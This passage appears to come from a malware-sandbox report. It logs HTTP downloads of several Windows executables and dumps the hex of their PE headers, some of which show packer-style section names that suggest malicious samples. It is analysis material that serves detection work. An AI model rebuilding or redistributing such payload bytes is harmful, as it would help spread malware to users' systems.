00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 18:09:17 GMTContent-Type: application/octet-streamContent-Length: 1898496Last-Modified: Fri, 26 Jul 2024 17:32:44 GMTConnection: keep-aliveETag: "66a3ddbc-1cf800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 d0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4b 00 00 04 00 00 f0 a2 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c bb 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc ba 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 7a 65 71 62 78 65 73 00 e0 19 00 00 e0 30 00 00 de 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 67 67 68 75 6f 7a 63 00 10 00 00 00 c0 4a 00 00 04 00 00 00 d2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4a 00 00 22 00 00 00 d6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 18:09:19 GMTContent-Type: application/octet-streamContent-Length: 1909760Last-Modified: Fri, 26 Jul 2024 17:32:08 GMTConnection: keep-aliveETag: "66a3dd98-1d2400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4c 00 00 04 00 00 e7 3a 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 da 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 d9 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 73 6f 72 69 69 6a 74 00 10 1a 00 00 d0 31 00 00 0c 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6d 66 75 77 6a 67 62 00 10 00 00 00 e0 4b 00 00 04 00 00 00 fe 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4b 00 00 22 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 18:10:05 GMTContent-Type: application/octet-streamContent-Length: 250880Last-Modified: Fri, 26 Jul 2024 17:47:55 GMTConnection: keep-aliveETag: "66a3e14b-3d400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 40 67 94 73 04 06 fa 20 04 06 fa 20 04 06 fa 20 6b 70 51 20 1f 06 fa 20 6b 70 64 20 14 06 fa 20 6b 70 50 20 60 06 fa 20 0d 7e 69 20 0f 06 fa 20 04 06 fb 20 76 06 fa 20 6b 70 55 20 05 06 fa 20 6b 70 60 20 05 06 fa 20 6b 70 67 20 05 06 fa 20 52 69 63 68 04 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 7b ca c8 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1c 02 00 00 78 03 02 00 00 00 00 c9 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 52 40 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 58 02 00 78 00 00 00 00 c0 04 02 08 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 1a 02 00 00 10 00 00 00 1c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 32 00 00 00 30 02 00 00 34 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 69 70 65 77 61 76 d3 02 00 00 00 a0 04 02 00 04 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 61 74 61 00 00 00 00 04 00 00 00 b0 04 02 00 04 00 00 00 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 9a 00 00 00 c0 04 02 00 9c 00 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
